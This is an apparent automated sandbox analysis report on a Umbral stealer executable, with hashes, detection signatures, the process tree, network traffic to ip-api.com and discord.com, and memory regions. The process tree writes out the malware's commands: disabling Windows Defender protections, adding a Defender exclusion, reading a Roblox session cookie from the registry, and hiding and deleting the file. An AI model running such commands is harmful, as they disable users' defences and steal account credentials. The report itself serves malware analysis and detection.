Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-08-2024 15:26

General

  • Target

    Umbral.exe

  • Size

    231KB

  • MD5

    37040bc6e02b555d9062631211678bc9

  • SHA1

    cb2f4548ce9bd51ce42301ffa74130d9c6098ad5

  • SHA256

    3294164d79836fe3765e57e50dd0ac898164ccc049f097fb2deb2725478aa583

  • SHA512

    e5db52931152bef14e1dda82288a1f4265d79c4c4ad08f143994b2b60b2b530dfbcdcb1468bd70e5799a55b2a4f02565249e0d41944032bbd43a296757d9754c

  • SSDEEP

    6144:RloZM+rIkd8g+EtXHkv/iD4FxEe9rI8jB67NokR4cb8e1mtqpui:joZtL+EP8FxEe9rI8jB67NokRxuqR

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2508
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:2376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1992
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:1872
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:2212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1556
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:1508
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • Deletes itself
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1668

Network

  • flag-us
    DNS
    gstatic.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    gstatic.com
    IN A
    Response
    gstatic.com
    IN A
    172.217.23.195
  • flag-us
    DNS
    gstatic.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    gstatic.com
    IN A
  • flag-nl
    GET
    https://gstatic.com/generate_204
    Umbral.exe
    Remote address:
    172.217.23.195:443
    Request
    GET /generate_204 HTTP/1.1
    Host: gstatic.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Mon, 05 Aug 2024 15:27:10 GMT
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-nl
    GET
    https://gstatic.com/generate_204
    Umbral.exe
    Remote address:
    172.217.23.195:443
    Request
    GET /generate_204 HTTP/1.1
    Host: gstatic.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Mon, 05 Aug 2024 15:28:08 GMT
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    ip-api.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    Umbral.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 05 Aug 2024 15:28:07 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 42
    X-Rl: 41
  • flag-us
    GET
    http://ip-api.com/json/?fields=225545
    Umbral.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Response
    HTTP/1.1 200 OK
    Date: Mon, 05 Aug 2024 15:28:10 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 161
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.128.233
  • flag-us
    DNS
    discord.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
  • flag-us
    DNS
    discord.com
    Umbral.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
  • 172.217.23.195:443
    https://gstatic.com/generate_204
    tls, http
    Umbral.exe
    1.5kB
    4.9kB
    16
    11

    HTTP Request

    GET https://gstatic.com/generate_204

    HTTP Response

    204
  • 172.217.23.195:443
    https://gstatic.com/generate_204
    tls, http
    Umbral.exe
    621 B
    572 B
    7
    5

    HTTP Request

    GET https://gstatic.com/generate_204

    HTTP Response

    204
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    Umbral.exe
    310 B
    267 B
    5
    2

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/?fields=225545
    http
    Umbral.exe
    285 B
    510 B
    5
    4

    HTTP Request

    GET http://ip-api.com/json/?fields=225545

    HTTP Response

    200
  • 162.159.138.232:443
    discord.com
    tls
    Umbral.exe
    345 B
    219 B
    5
    5
  • 8.8.8.8:53
    gstatic.com
    dns
    Umbral.exe
    114 B
    73 B
    2
    1

    DNS Request

    gstatic.com

    DNS Request

    gstatic.com

    DNS Response

    172.217.23.195

  • 8.8.8.8:53
    ip-api.com
    dns
    Umbral.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    Umbral.exe
    171 B
    137 B
    3
    1

    DNS Request

    discord.com

    DNS Request

    discord.com

    DNS Request

    discord.com

    DNS Response

    162.159.138.232
    162.159.135.232
    162.159.137.232
    162.159.136.232
    162.159.128.233

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    fbe2b67bb3b86013da8d8cf2e9fe89bc

    SHA1

    d8de7ccc68024d275b24e2e3dd9aa52e77dde66f

    SHA256

    b5d6db00f75712561c86da22a18ddcbfbc2a07ed13826c2fd04e53b582604a45

    SHA512

    f4d96bec2ff4ad0dad70249f36a7e43547fd2dd360bc75ae83268e07b9dfa81c38ca9f23580c7692f0aad48f8c5e70652a2a23d21ea7adf919e2d950f08aa2df

  • memory/1556-45-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2608-17-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/2608-16-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

  • memory/2972-10-0x00000000027F0000-0x00000000027F8000-memory.dmp

    Filesize

    32KB

  • memory/2972-9-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

    Filesize

    2.9MB

  • memory/3040-0-0x000007FEF5E83000-0x000007FEF5E84000-memory.dmp

    Filesize

    4KB

  • memory/3040-4-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

    Filesize

    9.9MB

  • memory/3040-3-0x000007FEF5E83000-0x000007FEF5E84000-memory.dmp

    Filesize

    4KB

  • memory/3040-2-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

    Filesize

    9.9MB

  • memory/3040-1-0x0000000000DD0000-0x0000000000E10000-memory.dmp

    Filesize

    256KB

  • memory/3040-49-0x000007FEF5E80000-0x000007FEF686C000-memory.dmp

    Filesize

    9.9MB
